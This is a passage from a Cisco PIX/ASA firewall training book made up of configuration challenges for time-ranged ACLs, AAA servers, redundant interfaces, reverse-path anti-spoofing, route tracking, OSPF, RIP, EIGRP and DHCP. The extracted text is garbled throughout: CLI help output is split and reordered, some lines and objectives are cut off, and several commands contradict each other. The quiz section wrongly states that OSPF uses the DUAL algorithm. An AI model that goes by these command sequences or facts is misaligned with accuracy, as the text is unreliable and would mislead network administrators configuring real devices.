request-data-size Request data size
threshold
Operation threshold in milliseconds
timeout
Timeout of an operation
tos
Type Of Service
<cr>
Cisco ASA/PIX Challenge 99

Outline
The ASA device supports a time-range for ACLs, such as defining an access-list for a
weekend, or for specific day. It also includes two configuration elements for AAA settings
(not linked to time-ranges).
Note: ASA/PIX 7.x only
Objectives
Define a time-range.
Implement a time-ranged ACL.
Define an AAA group tag.
Define an AAA host.
Define AAA host details.
Commands
(config)# int e0
(config-if)# exit
(config)# time-range workingday
(config-time-range)# periodic weekday 5:00 to 9:00
(config-time-range)# periodic saturday 3:00 to 15:00
(config-time-range)# exit
(config)# access-list Columbia permit ip any any time-range workingday
(config)# aaa-server test protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server test (newyork) host 1.2.3.4
NetworkSims.com
611
(config-aaa-server-host)#
key testkey
authentication-port 1645
accounting-port 1646
retry-interval 10
exit
Example
(config)# int e0
(config-if)# exit
(config-time-range)# ?
Time range configuration commands:
absolute absolute time and date
exit
Exit from time-range configuration mode
help
Help for time-range configuration commands
no
periodic periodic time and date
(config-time-range)# ab ?
trange mode commands/options:
end
ending time and date
start starting time and date
(config-time-range)# periodic ?
Friday
Friday
Monday
Monday
Saturday
Saturday
Sunday
Sunday
Thursday
Thursday
Tuesday
Tuesday
Wednesday Wednesday
daily
Every day of the week
weekdays
Monday thru Friday
weekend
Saturday and Sunday
interval Performance monitoring interval in seconds
quiet
Turn on quiet mode for perfomance monitoring
settings View perfomance monitoring settings
verbose
Turn on verbose mode for perfomance monitoring
(config-time-range)# periodic weekday ?
hh:mm Starting time
(config-time-range)# periodic weekday 5:00 ?
to ending day and time
(config-time-range)# periodic weekday 5:00 to ?
NetworkSims.com
612
hh:mm Ending time - stays valid until beginning of next minute

Next the AAA server is defined:

pixfirewall(config)# aaa-server ?
WORD < 17 char Enter a AAA server group tag
pixfirewall(config)# aaa-server test ?
(
Open parenthesis for the name of the network interface
where the designated AAA server is accessed
deadtime
Specify the amount of time that will elapse between the
disabling of the last server in the group and the
subsequent re-enabling of all servers
host
Enter this keyword to specify the IP address for the
server
max-failed-attempts Specify the maximum number of failures that will be
allowed for any server in the group before that server
is deactivated
protocol
Enter the protocol for a AAA server group
pixfirewall(config)# aaa-s test protocol ?
kerberos Protocol Kerberos
ldap
Protocol LDAP
nt
Protocol NT
radius
Protocol RADIUS
sdi
Protocol SDI
tacacs+
Protocol TACACS+
(config-aaa-server-group)# ?
AAA server configuration commands:
accounting-mode
Enter this keyword to specify accounting mode
exit
Exit from aaa-server group configuration mode
help
Help for AAA server configuration commands
is deactivated
no
Remove an item from aaa-server group configuration
reactivation-mode
reactivated
(config-aaa-server-group)# accounting-mode ?
aaa-server-group mode commands/options:
simultaneous Enter this keyword to specify simultaneous accounting
single
Enter this keyword to specify single accounting
(config-aaa-server-group)# max-failed-attempts ?
NetworkSims.com
613
<1-5>
Maximum number of failures (1-5)
(config-aaa-server-group)# reactivation-mode ?
depletion Failed servers will remain inactive until all other servers in
this group are inactive
timed
Failed servers will be reactivated after 30 seconds of down time
(config)# aaa-server test ?
(
deadtime
host
server
is deactivated
protocol
(config)# aaa-server test (newyork) ?
host Enter this keyword to specify the IP address for the server
(config)# aaa-server test (newyork) h ?
Hostname or A.B.C.D Enter an IP address or a name
WORD < 129 char
Enter a DNS name
(config)# aaa-server test (newyork) h 1.2.3.4 ?
WORD
Alphanumeric keyword up to 128 characters used as the encryption key
for communicating with the AAA server.
timeout Specify the maximum time to wait for response from configured server
<cr>
(config)# aaa-server test (inside) host 1.2.3.4
(config-aaa-server-host)# ?
accounting-port
Specify the port number to be used for accounting
acl-netmask-convert Specify the ACL Downloadable Netmask Operation
authentication-port Specify the port number to be used for authentication
exit
Exit from aaa-server host configuration mode
help
key
Specify the secret used to authenticate the NAS to the
AAA server
no
Remove an item from aaa-server host configuration
radius-common-pw
Specify a common password for all RADIUS authorization
transactions
retry-interval
Specify the amount of time between retry attempts
timeout
Specify the maximum time to wait for response from
configured server
(config-aaa-server-host)# acc ?
aaa-server-host mode commands/options:
<0-65535> Enter port number (0 - 65535)
NetworkSims.com
614
ERROR: % Ambiguous command: "acc "

(config-aaa-server-host)# acl- ?
aaa-server-host mode
auto-detect Enter
standard
Enter
wildcard
Enter
commands/options:
this keyword to specify auto-detect netmask
this keyword to specify standard netmask
this keyword to specify wildcard netmask
configured server
(config-aaa-server-host)# key ?
WORD < 129 char Enter an alphanumeric string up to 128 characters
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# radius ?
(config-aaa-server-host)# ret ?
<1-10> Number of seconds (1 - 10)
(config-aaa-server-host)# tim ?
(config-aaa-server-host)# authentication-port 1645
(config-aaa-server-host)# accounting-port 1646
(config-aaa-server-host)# retry-interval 10

Title: Interface-level Redundancy
Outline
The ASA device supports interface redundancy, where interfaces can be defined with the
same firewall functionality (inside, outside, and so on), and thus connect to the same
network. One of the interfaces can thus be active while the other goes into a standby mode.
If the active interface goes down, then the standby interface will take its place.
The redundant interace is a logical interface with pairs for an active and a standby physical
interface, and the ASA supports up to eight redundant interface pairs.
Note: PIX/ASA 8.x only
Objectives
NetworkSims.com
615
Enable Ethernet interfaces.

Define the redundancy interface.
Define name and IP details for the redundant interface.
Define the interfaces for membership of the redundant interface.
Show the active device, and standby (using the show redundant command)
Commands
# show version
(config)# int e0
(config-if)# no nameif
(config-if)# no ip address
(config-if)# no ip security-level
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int redundant 1
(config-if)# member-interface e0
(config-if)# exit
(config)# exit
# show interface redundant 1
Example
# show version
Cisco PIX Security Appliance Software Version 7.0(1)
Device Manager Version 5.0(1)
Compiled on Thu 31-Mar-05 14:37 by builders
System image file is "flash:/image.bin"
Config file at boot was "startup-config"
pixfirewall up 10 mins 40 secs
Hardware:
PIX-515E, 96 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff00000, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
0: Ext: Ethernet0
1: Ext: Ethernet1
2: Ext: Ethernet2
: media index
: media index
: media index
0: irq 10
1: irq 11
2: irq 11
Licensed features for this platform:

Maximum Physical Interfaces : 3
Maximum VLANs
: 10
Inside Hosts
: Unlimited
Failover
: Disabled
NetworkSims.com
616
VPN-DES
VPN-3DES-AES
Cut-through Proxy
Guards
URL Filtering
Security Contexts
GTP/GPRS
VPN Peers
:
:
:
:
:
:
:
:
Enabled
Enabled
Enabled
Enabled
Enabled
0
Disabled
Unlimited
This platform has a Restricted (R) license.

Serial Number: 807290112
Running Activation Key: 0x3f43a2b7 0xf5909081 0x5fd21d2b 0x16cbcc59
Configuration last modified by enable_15 at 15:42:06.949 UTC Thu Dec 28 2006
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int redundant 1
(config-if)# exit
(config)# exit
# show interface redundant 1

Interface Redundant1 inside is up, line protocol is up
Redundancy Information:
Member e0 (active), e1
Last switchover at 00:00:00 GMT Jun 1 2008
After the redundant interface is define, there should be no changes to the interfaces
involved, apart from setting the duplex and speed settings, which are inherited by the
NetworkSims.com
617
redundant interface. A great strength of interface redundancy is that it responds within 0.5s,
which is faster than for failover.
To change the active interface to e1, the following command is used:
# redundant-interface redundant1 active-member e1

Title: Routing Information to Prevent IP Address Spoofing
Outline
With Reverse Path Forwarding (RPF), the firewall detects spoofed source addresses, as it
examines the source of every data packet which arrives at a specific interface. It then tried to
find a reverse path back to the source. If it cannot find this, it will reject the packet (and a
logging message stored).
Objectives
Enable Ethernet interfaces.

Define RPF on an interface.
Display RPF statistics.
Commands
# show version
# config t
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# ip verify reverse-path interface inside
(config)# ip verify reverse-path interface outside
(config)# exit
# show ip verify statistics
Example
NetworkSims.com
618
# show version
# config t
(config)# int e0
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# ip verify ?
reverse-path Keyword to indicate Reverse-Path Filtering
(config)# ip verify reverse-path ?
interface Keyword to apply RPF on an interface
(config)# ip verify reverse-path interface ?
Inf2
Inside
Outside
(config)# ip verify reverse-path interface inside
(config)# ip verify reverse-path interface outside
# sh ip ?
address Show IP addresses, DHCP leases
audit
Show ip audit statistics
local
Show ip local pool information
verify
Show Reverse Path Verify (RPF) statistics
|
Output modifiers
<cr>
# sh ip verify ?
statistics Show Reverse Path Verify (RPF) statistics
# sh ip verify statistics
interface outside: 100 unicast rpf drops
interface inside: 300 unicast rpf drops
interface inf: 43 unicast rpf drops

Title: Default route for tunneled traffic
Outline
NetworkSims.com
619
The PIX/ASA devices can have multiple default routes, each with a different cost. It can also
have a default route for tunneled traffic, thus non-encrypted traffic, without a static route,
would go via the normal default gateway, and encrypted traffic, without a static route,
would go via the tunneled gateway.
Objectives
Define E0, E1 and E2 interface details.

Define a default gateway for non-encrypted traffic. A default metric (1) is used for
the distance metric.
Define a default gateway for encrypted traffic.
Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# exit
(config)# route Glasgow 0 0 192.168.0.1
(config)# route Glasgow 0 0 192.168.0.3 tunneled
Example
# config t
(config)# int e0
(config-if)# exit
(config)# route ?
Inf2
Inside
Glasgow
(config)# route Glasgow ?
Hostname or A.B.C.D The foreign network for this route, 0 means default
(config)# route Glasgow 0 ?
(config)# route Glasgow 0 0 ?
NetworkSims.com
620

is reached.
(config)# route Glasgow 0 0 192.168.0.3 ?
<1-255>
to 255
<cr>
(config)# route Glasgow 0 0 192.168.0.3 tunneled

Title: Favouring Static Routes with better Reachability
Outline
Normally a static route will stay active, but problems can occur if the route goes down. Thus
the PIX/ASA device can base the static route on the best performance, thus if one route goes
down, the other will take over. The SLA (Service Level Agreement) monitor process is used
to monitor an arbitary target address.
Objectives
Enable the SLA monitor process (with sla monitor ID).

Define the reachability test (with type echo protocol ipicmpecho IPDEST interface
IFNAME), which sends an ICMP packet require to a target IP address (IPDEST) on a
given interface (IFNAME).
Define optional test parameters, such as frequency of test, number of packets,
request data size, Type-of-service (TOS), timeout and threshold.
Run tests forever (with sla monitor ID life forever now).
Enable reachability tracking (using track TRACKID rtr ID reachability).
Define tracking on a static route (route INTERFACENAME 0 0 IPGATEWAY track
TRACKID).
Commands
# config t
(config)# int e0
NetworkSims.com
621
(config-if)# exit
(config)# sla monitor 3
(config-sla-monitor)# type echo protocol ipicmpecho 192.168.0.2 interface glasgow
(config-sla-monitor-echo)# frequency 10
(config-sla-monitor-echo)# num-packets 100
(config-sla-monitor-echo)# request-data-size 100
(config-sla-monitor-echo)# tos 10
(config-sla-monitor-echo)# timeout 100
(config-sla-monitor-echo)# threshold 100
(config-sla-monitor-echo)# exit
(config-sla-monitor)# exit
(config)# sla monitor 3 schedule life forever now
(config)# track 1 rtr 3 reachability
(config)# route Glasgow 0 0 192.168.0.2 track 1
(config)# exit
# show track
# show route
Example
# config t
(config)# int e0
(config-if)# exit
(config)# sla ?
monitor IP Service Level Agreement Monitor
(config)# sla mon ?
<1-2147483647> Entry Number
schedule
IP SLA Monitor Entry Scheduling
IP SLA Monitor Echo Configuration Commands:
default
exit
Exit probe configuration
frequency
Frequency of an operation
no
num-packets
Number of Packets
request-data-size Request data size
threshold
Operation threshold in milliseconds
timeout
Timeout of an operation
tos
Type Of Service
<cr>
(config-sla-monitor-echo)# freq ?
sla-monitor-echo mode commands/options:
<1-604800> Frequency in seconds
(config-sla-monitor-echo)# num ?
NetworkSims.com
622

<1-100> Number of Packets to be transmitted
(config-sla-monitor-echo)# req ?
<0-16384> Number of bytes in payload
(config-sla-monitor-echo)# thre ?
<0-2147483647> Millisecond threshold value
(config-sla-monitor-echo)# timeout ?
<0-604800000> Timeout in milliseconds
(config-sla-monitor-echo)# tos ?
<0-255> Type of Service Value
(config)# sla monitor schedule 3 life forever now
(config)# exit
# show track
Track 1
Response Time Reporter 142 reachability
Reachability is UP
3 changes, last change 02:31:36
Latest operation return code: OK
Latest RTT (millisecs) 0
Tracked by:
STATIC-IP-ROUTING 0
# show route
S
0.0.0.0 0.0.0.0 [1/0] via 192.168.0.2, glasgow
C
192.168.0.1 255.255.255.0 is directly connected, glasgow
C
192.168.1.1 255.255.255.0 is directly connected, inside
C
192.168.2.1 255.255.255.0 is directly connected, dmz
In this case the default gateway is at 192.168.0.2, and will be tracked for SLA 3.

Title: Favouring Static Routes with better Reachability, and using DHCP to track the
default gateway.
Outline
NetworkSims.com
623
This challenge uses DHCP to track the default route. The device will poll the DHCP server
to determine the default route.
Objectives

TRACKID).
Enable DHCP tracking.
Commands
# config t
(config)# int e0
(config-if)# dhcp client route track 1
(config-if)# ip address dhcp setroute
(config-if)# exit
(config)# exit
# show track
# show route
Example
# config t
(config)# int e0
(config-if)# nameif Glasgow
(config-if)# dhcp ?
NetworkSims.com
624

client DHCP client configuration
(config-if)# dhcp client ?
route
Options for routes installed by dhcp
update Dynamically update information
(config-if)# dhcp client route ?
distance Administrative distance for dhcp routes
track
Track dhcp routes
(config-if)# dhcp client route track ?
<1-500> Tracked object number
(config-if)# dhcp client route track 1 ?
<cr>
(config-if)# dhcp client route track 1
(config-if)# ip ?
address Configure the ip address and mask for an interface
configure
audit
local
verify
Configure Unicast Reverse Path Filtering on an interface
Hostname or A.B.C.D Firewall's network interface address
dhcp
Keyword to use DHCP to poll for information. Enables the
DHCP client feature on the specified interface
pppoe
Keyword to use PPPoE to poll for information. Enables
the PPPoE client feature on the specified interface
(config-if)# ip address dhcp ?
setroute Keyword to set the default route using the default gateway
parameter the DHCP server returns
<cr>
(config-if)# ip address dhcp setroute
(config-if)# exit
NetworkSims.com
625
(config)# exit
# show track
# show route

Title: Favouring Static Routes with better Reachability, and using PPP over Ethernet
(PPPoE) to track the default gateway.
Outline
This challenge uses PPPoE to track the default route. The device will use PPPoE to
determine the default route.
Objectives

TRACKID).
Enable PPPoE tracking.
Commands
# config t
(config)# int e0
(config-if)# pppoe client route track 1
(config-if)# ip address pppoe setroute
(config-if)# exit
NetworkSims.com
626

(config)# exit
# show track
# show route
Example
# config t
(config)# int e0
(config-if)# pppoe ?
client PPPoE client configuration
(config-if)# pppoe client ?
route
Options for routes installed by pppoe
secondary Options for backup pppoe interfaces
vpdn
Configure VPDN parameters
(config-if)# pppoe client route ?
distance Administrative distance for pppoe routes
track
Track pppoe routes
(config-if)# pppoe client route track ?
<1-500> Tracked object number
(config-if)# pppoe client route track 1 ?
<cr>
(config-if)# pppoe client route track 1
(config-if)# ip ?
address Configure the ip address and mask for an interface
configure
audit
local
verify
Configure Unicast Reverse Path Filtering on an interface
NetworkSims.com
627
dhcp
pppoe
(config-if)# ip address pppoe ?
setroute Keyword to set the default route using the default gateway
parameter the PPPoE server returns
<cr>
(config-if)# ip address pppoe setroute ?
<cr>
(config-if)# ip address pppoe setroute
(config-if)# exit
(config)# exit
# show track
# show route

Title: Redistributing Routes in OSPF
Outline
The PIX/ASA can redistribute routers in OSPF using a route-map. OSPF is an excellent
routing method, and uses a link-state algorithm to find the shortest path to every route.
Each routing device maintains the same link-state routing database, for each interface and
all the reachable interfaces. All routing decisions are based on a cost based on bandwidth or
for route preference, rather than on simple methods, such as hop count (as used in RIP).
Unfortunately OSPF is fairly heavy on CPU utilization. In this example two OSPF processes
are run, and there is a redistribution of the subnets of the routes, before the processes.
NetworkSims.com
628
Objectives
Define a route-map.
Define OSPF routing details.
Redistribute routes using the route-map.
Commands
# config t
(config)# int e0
(config-if)# exit
(config)# route-map testing permit
(config-route-map)# set metric-type type-1
(config-route-map)# set tag 1
(config-router)# redistribute ospf 1 route-map testing
Example
(config)# route-map ?
WORD < 58 char Route map tag
(config)# route-map rtest ?
<0-65535> Sequence to insert to/delete from existing route-map entry
deny
Route map denies set operations
permit
Route map permits set operations
<cr>
exit
help
Interactive help for route-map subcommands
match Match values from routing table
no
Negate a command
set
pixfirewall(config-route-map)# match ?
interface
ip
Match IP address or next-hop or route-source
NetworkSims.com
629
metric
route-type

Match route-type of route
(config-route-map)# match metric ?

(config-route-map)# set ?
metric
Set metric value for destination routing protocol
metric-type Set type of metric for destination routing protocol
(config-route-map)# set metric- ?
(config-route-map)# set metric- type-1
(config-route-map)# set metric ?
connected Connected
ospf
static
Static routes
(config-router)# redistribute ospf 1 ?
match
metric
route-map
Route map reference
subnets
tag
<cr>
(config-router)# redistribute ospf 1 route-map ?
WORD Pointer to route-map entries
(config-router)# redistribute ospf 1 route-map rtest ?
match
metric
subnets
tag
<cr>
(config-router)# redistribute ospf 1 route-map rtest
NetworkSims.com
630
In this case:
(config-route-map)# set metric-type type-1
(config-route-map)# set tag 1
(config-router)# redistribute ospf 1 route-map testing
will redistribute the routes from OSPF process 1 into OSPF process 111, using a match
metric of 1. The PIX/ASA will then redistribute these with a metric of 5, with a Type-1
metric tag, and a tag value of 1.

Title: Defining OSPF Interface Costs
Outline
With OSPF, each routing device maintains the same link-state routing database, for each
interface and all the reachable interfaces. All routing decisions are based on a cost based on
bandwidth or for route preference, rather than on simple methods, such as hop count (as
used in RIP). In this challenge the OSPF costs are defined for an interface. For the interface,
the dead-interval is the time that the device must wait before it declares that a neighboring
device is down. Normally hello packets are passed, and if no hello packets are received with
the dead-interval, it is declared as down. The length of time between transmitted hello
packets is defined by the hello-interval. If OSPF MD5 authentication is used, the key is
defined with a key ID and a key, using the ospf message-digest-key command. Also the
priority of the OSPF device is defined so that the OSPF designated router can be found for
the network. This uses the priority option of the ospf command in an interface. For simple
pass phase authentication (OSPF password), the authentication-key option is used.
Objectives
Define a route-map.
Define OSPF routing details.
Redistribute routes using the route-map.
Commands
NetworkSims.com
631

(config)# int e1
Example
(config)# int e1
(config-if)# ospf ?
authentication
authentication-key
cost
Interface cost
database-filter
dead-interval
hello-interval
message-digest-key
mtu-ignore
network
Network type
priority
Router priority
advertisements
transmit-delay
(config-if)# ospf cost ?
<1-65535> Cost
pixfirewall(config-if)# ospf retransmit-interval ?
<1-65535> Seconds
(config-if)# ospf transmit-delay ?
<1-65535> Seconds
(config-if)# ospf priority ?
NetworkSims.com
632

<0-255> Priority
(config-if)# os he ?
<1-65535> Seconds
(config-if)# os de ?
<1-65535> Seconds
(config-if)# ospf authentication-key ?
LINE < 9 char The OSPF password (key)
(config-if)# ospf message-digest-key ?
<1-255> Key ID
(config-if)# ospf message-digest-key 1 ?
md5 Use MD5 algorithm
(config-if)# ospf message-digest-key 1 md5 ?
LINE < 17 char The OSPF password (key)
(config-if)# ospf authentication ?
null
Use no authentication
<cr>
(config-if)# exit
(config)# exit
# sh ospf
Routing Process "ospf 1" with ID 1.2.3.4 and Domain ID 0.0.0.1
Supports only single TOS(TOS0) routes
Does not support opaque LSA
SPF schedule delay 5 secs, Hold time between two SPFs 10 secs
Minimum LSA interval 5 secs. Minimum LSA arrival 1 secs
Number of external LSA 0. Checksum Sum 0x
0
Number of opaque AS LSA 0. Checksum Sum 0x
0
Number of DCbitless external and opaque AS LSA 0
NetworkSims.com
633
Number of DoNotAge external and opaque AS LSA 0

Number of areas in this router is 1. 1 normal 0 stub 0 nssa
External flood list length 0
Area 1
Number of interfaces in this area is 1
Area has no authentication
SPF algorithm executed 1 times
Area ranges are
Number of LSA 1. Checksum Sum 0x ff12
Number of opaque link LSA 0. Checksum Sum 0x
0
Number of DCbitless LSA 0
Number of indication LSA 0
Number of DoNotAge LSA 0
Flood list length 0

Title: Defining OSPF Area Details
Outline
With OSPF, the main area details include defining:
Authenication. This provides protection against intruders with an OSPF

authentication password.
Stub areas. These are areas in which any information gained on external networks is
not sent.
Default costs.
Other features included in this challenge are:

Route Summarization. It is possible to summarize routes between OSPF areas, such as with:
command which cause a single route summarization to be sent for the network address of
2.3.4.0, which should cover all the networks within this area (10).
Default Route. In this case a boundary router generates a default route for the whole of the
OSPF domain. For example:
(config-router)# default-information originate always
forces the boundary device to generate a default route for the OSPF routing domain.
Route Calculation Timers. This relates to the delays used with OSPF for topolology
changes, and for SPF (Shortest Path First) calculations. For example:
NetworkSims.com
634
(config-router)# timers spf 10 20
defines a delay between receiving a change is the SPF calculation as 10 seconds, and a hold
time betwee consecutive SPF calculations of 20 seconds.
Logging Neighbor state. This is used to log the state of neigbhoring devices. For example:
(config-router)# log-adj-changes detail
logs the neighbor state in detail.

Objectives
Define OSPF.
Define OSPF routing area details.
Define OSPF stub details.
Define route timers.
Define default route.
Define logging of neighbors.
Outline
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
ospf 111
area 1 authentication
area 1 authentication message-digest
area 10 stub
area 10 default-cost 15
summary-address 1.2.3.0 255.255.0.0
area 10 range 2.3.4.0 255.255.0.0
default-information originate always
log-adj-changes detail
timers spf 10 10
Example
(config-router)# ?
area
compatible
distance
exit
help
ignore
log-adj-changes
neighbor
network
no
Negate a command
NetworkSims.com
635
redistribute
router-id
summary-address
timers

(config-router)# area ?
A.B.C.D
(config-router)# area 1 ?
default-cost
filter-list
nssa
Specify a NSSA area
range
stub
Specify a stub area
virtual-link
<cr>
(config-router)# area 1 authentication ?
<cr>
(config-router)# area 10 stub
(config-router)# area 10 default-cost ?
<0-65535> Stub's advertised external route metric
(config-router)# area 10 default-cost 15
Route summarization allows for various routes to summarized into a single address, and
help to reduce the size of the routing tables:
(config-router)# summary-address ?
A.B.C.D IP summary address
(config-router)# summary-address 1.2.3.0 ?
A.B.C.D Summary mask
(config-router)# summary-address 1.2.3.0 255.255.0.0
To summarize between OSPF areas:

(config-router)# area 10 range ?
(config-router)# area 10 range 2.3.4.0 ?
NetworkSims.com
636
A.B.C.D
IP mask for address
To generate a default route:

(config-router)# default-information ?
(config-router)# default-information originate ?
always
Always advertise default route
metric
OSPF default metric
metric-type OSPF metric type for default routes
route-map
Route-map reference
<cr>
(config-router)# default-information originate always
(config-router)# log-adj-changes ?
detail Log all state changes
<cr>
(config-router)# log-adj-changes detail
For OSPF timers:

(config-router)# timers ?
lsa-group-pacing OSPF LSA group pacing timer
spf
OSPF SPF timers
(config-router)# timers spf ?
<1-65535> Delay between receiving a change to SPF calculation
(config-router)# timers spf 10 ?
<1-65535> Hold time between consecutive SPF calculations
(config-router)# timers spf 10 10

Title: Listening to RIP for Routing Information (Version 1)
Outline
NetworkSims.com
637
The PIX/ASA devices can passively listen to RIP updates, using RIP Version 1 or RIP
Version 2. RIP Version 1 only supports classful addressing, with unencrypted broadcasts,
while RIP Version 2 supports classless addressing, and authentication. This challenge
defines RIP Version 1.
Objectives

Define RIP Version 1 on each of the interfaces.
Commands
# config t
(config)# int e0
(config-if)# exit
(config)# rip Glasgow passive version 1
Example
# config t
(config)# int e0
(config-if)# exit
(config)# rip ?
Inf2
Inside
Glasgow
(config)# rip Glasgow ?
default Configure the system to advertise default route
passive Enable the system to passively listen to RIP updates
(config)# rip Glasgow passive ?
version RIP version, default is RIPv1
<cr>
(config)# rip Glasgow passive version ?
1 RIP Version 1 (RIPv1)
NetworkSims.com
638
(config)# rip Glasgow passive version 1 ?

<cr>
(config)# rip Glasgow passive version 1

Title: Listening to RIP for Routing Information (Version 2)
Outline
The PIX/ASA devices can passively listen to RIP updates, using RIP Version 1 or RIP
Version 2. RIP Version 1 only supports classful addressing, with unencrypted broadcasts,
while RIP Version 2 supports classless addressing, and authentication. This challenge
defines RIP Version 2.
Objectives

Define RIP Version 2 on each of the interfaces.
Commands
# config t
(config)# int e0
(config-if)# exit
(config)# rip Glasgow passive version 2 authentication text popup
Example
# config t
(config)# int e0
(config-if)# exit
(config)# rip ?
NetworkSims.com
639
Inf2
Inside
Glasgow
(config)# rip Glasgow ?
default Configure the system to advertise default route
passive Enable the system to passively listen to RIP updates
(config)# rip Glasgow passive ?
version RIP version, default is RIPv1
<cr>
(config)# rip Glasgow passive version ?
(config)# rip Glasgow passive version 2 ?
authentication Authenticate using the specified mode
<cr>
(config)# rip Glasgow version 2 authentication ?
md5
Authenticate using md5 mode
text Authenticate using text mode
(config)# rip Glasgow passive version 2 authentication text ?
WORD < 17 char The shared key to be used for authentication
(config)# rip Glasgow passive version 2 authentication text popup

Title: RIP on a PIX/ASA device.
Outline
In the past, an PIX/ASA device could only passively listen to RIP updates, using RIP
Version 1 or RIP Version 2, where RIP Version 1 supports classful addressing, with
unencrypted broadcasts, and RIP Version 2 supports classless addressing, and
authentication. Many PIX/ASA devices now fully support RIP.
Objectives
NetworkSims.com
640

Define RIP Version 2.
Define RIP broadcast networks.
Define a passive interface. In this mode the interface accepts RIP updates, but does
not send them out.
Generate a default route with the default-information command.
Define RIP authentication details on an interface.
Commands
# config t
(config)# int e0
(config-if)# rip authentication mode text
(config-if)# rip send version 2
(config-if)# rip receive version 2
(config-if)# rip authentication key test key-id 1
(config-if)# exit
(config-router)# passive-interface Glasgow
Example
# config t
(config)# int e0
(config-if)# rip ?
receive
send
(config-if)# rip a ?
key
Authentication key
mode Authentication mode
(config-if)# rip a m ?
md5
(config-if)# rip a m t ?
NetworkSims.com
641

<cr>
(config-if)# rip authentication mode text
(config-if)# rip r ?
(config-if)# rip s ?
(config-if)# rip s v ?
1 RIP version 1
2 RIP version 2
(config-if)# rip send version 2
(config-if)# rip receive version 2
(config-if)# rip a key ?
WORD < 17 char The shared key to be used for authentication key string
(config-if)# rip a k test ?
key_id Authentication key
(config-if)# rip a k test k ?
<0-255> The shared key id that matches the key
(config-if)# rip a k test k 1 ?
<cr>
(config-if)# rip authentication key test key-id 1
(config-if)# exit
(config)# router ?
ospf Open Shortest Path First (OSPF)
rip
(config-router)# ?
auto-summary
distribute-list
exit
help
network
Add/remove interfaces to/from routing process
no
Negate a command
passive-interface
redistribute
version
NetworkSims.com
642
(config-router)# network ?
Hostname or A.B.C.D Network address
(config-router)# version ?
<1-2> version
/md5
Compute an MD5 signature for a file
disk0: File to be verified
flash: File to be verified
(config-router)# default-information ?
(config-router)# default-information o ?
route-map Route-map reference
<cr>
(config-router)# default-information originate
(config-router)# passive-interface ?
default Suppress routing updates on all interfaces
Glasgow Name of interface ETHERNET0
Inside
Name of interface ETHERNET1
Inf2
<cr>
(config-router)# passive-interface Glasgow

Title: Enabling and configuring EIGRP
Outline
ASA 8.x brought many new features to the range, including:
EIGRP routing.
High-availability functionality.
SSL VPN enhancements.
SSL VPN support for Windows Vista and Mac OS X clients is now available.
AnyConnect VPN client.
Local certificate authority.
NetworkSims.com
643
VPN load balancing.

Additional browser-based SSL VPN features.
Transparent NAT.
The PIX/ASA devices can thus enable EIGRP routing, which is an enhancement of IGRP.
The main advantage of this protocol is that it only sends out routing information when there
is a change in the topology. EIPGRP is one of the new features of the PIX/ASA device.
Objectives

Define EIGRP routing and the networks in which to broadcast into (that is, the
networks which participate in the EIGRP routing process).
Define EIGRP authentication on E0.
Commands
# config t
(config)# int e0
(config-if)# authentication mode eigrp 111 md5
(config-if)# authentication key eigrp 111 testing key-id 1
(config-if)# exit
Example
# config t
(config)# int e0
(config-if)# authentication mode eigrp 111 md5
(config-if)# authentication key eigrp 111 testing key-id 1
(config-if)# exit
Cisco PIX Test (Challenge 113)

Outline
NetworkSims.com
644
This challenge involves taking a PIX test on routing protocols. The main facts are:
PIX/ASA have used RIP and OSPF, and have now added EIGRP.
RIP uses hop count to determine the best route.
OSPF uses a link-state algorithm to determine the best route.
OSPF uses the DUAL algorithm to determine the best route.

Title: DHCP Server on a PIX/ASA.
Outline
Objectives

Commands
# config t
(config)# int e0
(config-if)# exit
(config)# dhcpd enable glasgow
(config)# dhcpd dns 197.174.60.1
(config)# dhcpd address 197.174.60.2-197.174.60.22 glasgow
(config)# dhcpd wins 195.94.110.3
(config)# dhcpd lease 6
(config)# dhcpd domain athome.com
(config)# show dhcpd
Example
# config t
(config)# int e0
NetworkSims.com
645
(config-if)# exit
(config)# dhcpd ?
address
Configure the IP pool address range after this keyword
auto_config
Enable auto configuration from client
dns
Configure the IP addresses of the DNS servers after this
keyword
domain
Configure DNS domain name after this keyword
enable
Enable the DHCP server
lease
Configure the DHCPD lease length after this keyword
option
Configure options to pass to DHCP clients after this keyword
ping_timeout Configure ping timeout value after this keyword
wins
Configure the IP addresses of the NETBIOS servers after this
keyword
pixfirewall(config)# dhcpd enable ?
Available interfaces on which to enable the DHCP server:
Inside
Inf2
<cr>
(config)# dhcpd dn ?
Hostname or A.B.C.D IP address of server 1
(config)# dhcpd add ?
WORD IP address[es], <ip1>[-<ip2>]
(config)# dhcpd wins ?
(config)# dhcpd lease ?
<300-1048575> The length of lease, in seconds, granted to DHCP client
from the DHCP server, default is 3600
(config)# dhcpd domain ?
WORD DNS domain name

Title: Configuring DHCP server options for Cisco IP phones
NetworkSims.com
646
Outline
Cisco IP phones download their configuration from TFTP servers, which are not
preconfigured on them. Thus they send a DHCP request with an option field set to 150 (for a
list of TFTP servers) or 66 (for a single TFTP server) to discover the address for their
configuration. Also they may request the default gateway with an option of 3.
Objectives

Define default TFTP server for DHCP option 150.
Define default TFTP server for DHCP option 66.
Define default gateway server for DHCP option 3.
Commands
# config t
(config)# int e0
(config-if)# exit
(config)# dhcpd option 150 ip 192.168.0.1
(config)# dhcpd option 66 ascii 192.168.0.1
Example
# config t
(config)# int e0
(config-if)# exit
(config)# dhcpd ?
address
NetworkSims.com
647
auto_config
dns

keyword
domain
enable
lease
option
wins
keyword
pixfirewall(config)# dhcpd enable ?
Available interfaces on which to enable the DHCP server:
Inside
Inf2
<cr>
(config)# dhcpd dn ?
(config)# dhcpd add ?
WORD IP address[es], <ip1>[-<ip2>]
(config)# dhcpd wins ?
(config)# dhcpd lease ?
<300-1048575> The length of lease, in seconds, granted to DHCP client
from the DHCP server, default is 3600
(config)# dhcpd domain ?
WORD DNS domain name
(config)# dhcpd option ?
<0-255> DHCP option code
ciscoasa(config)# dhcpd option 150 ?
